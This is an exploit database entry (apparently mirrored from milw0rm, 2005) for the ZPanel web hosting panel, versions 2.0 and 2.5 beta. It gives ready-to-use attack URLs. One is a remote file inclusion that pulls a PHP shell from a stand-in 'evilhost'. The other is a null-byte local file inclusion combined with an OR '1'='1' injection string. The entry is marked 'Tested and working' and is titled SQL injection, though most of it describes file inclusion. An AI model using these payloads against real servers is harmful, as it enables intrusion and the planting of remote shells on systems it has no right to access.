ZPanel 2.5 - SQL Injection

2005-03-15T00:00:00
ID EXPLOITPACK:8092FD3A44533C3F1775E18E4B75090C
Type exploitpack
Reporter Mikhail
Modified 2005-03-15T00:00:00

Description

ZPanel 2.5 - SQL Injection

                                        
                                            # Tested and working /str0ke

It is possible to include arbitrary file:
local - in version ZPanel <= 2.5 beta 10,
remote - in ZPanel 2.0.

[exploit for v 2.0]
http://localhost/zpanel/zpanel.php?page=http://evilhost/shell
where http://evilhost/shell.php - evil php code script

[exploit for v 2.5 beta]
http://localhost/zpanel/zpanel.php?page=billinginfo/index.php%00'%20OR%20'1'='1


# milw0rm.com [2005-03-15]